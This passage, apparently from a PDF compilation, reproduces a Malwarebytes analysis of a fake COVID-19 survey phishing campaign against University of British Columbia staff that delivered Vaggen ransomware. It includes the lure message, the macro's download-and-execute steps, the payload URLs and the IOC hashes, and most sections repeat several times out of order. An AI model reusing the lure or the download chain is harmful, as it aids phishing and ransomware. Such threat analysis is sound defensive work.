the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3159 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3160 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3161 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3162 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3163 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3164 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3165 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3166 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3167 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3168 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3169 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3170 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3171 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3172 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3173 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3174 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3175 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3176 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3177 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3178 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3179 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3180 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3181 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3182 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3183 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3184 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3185 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3186 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3187 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3188 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3189 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3190 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3191 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3192 of 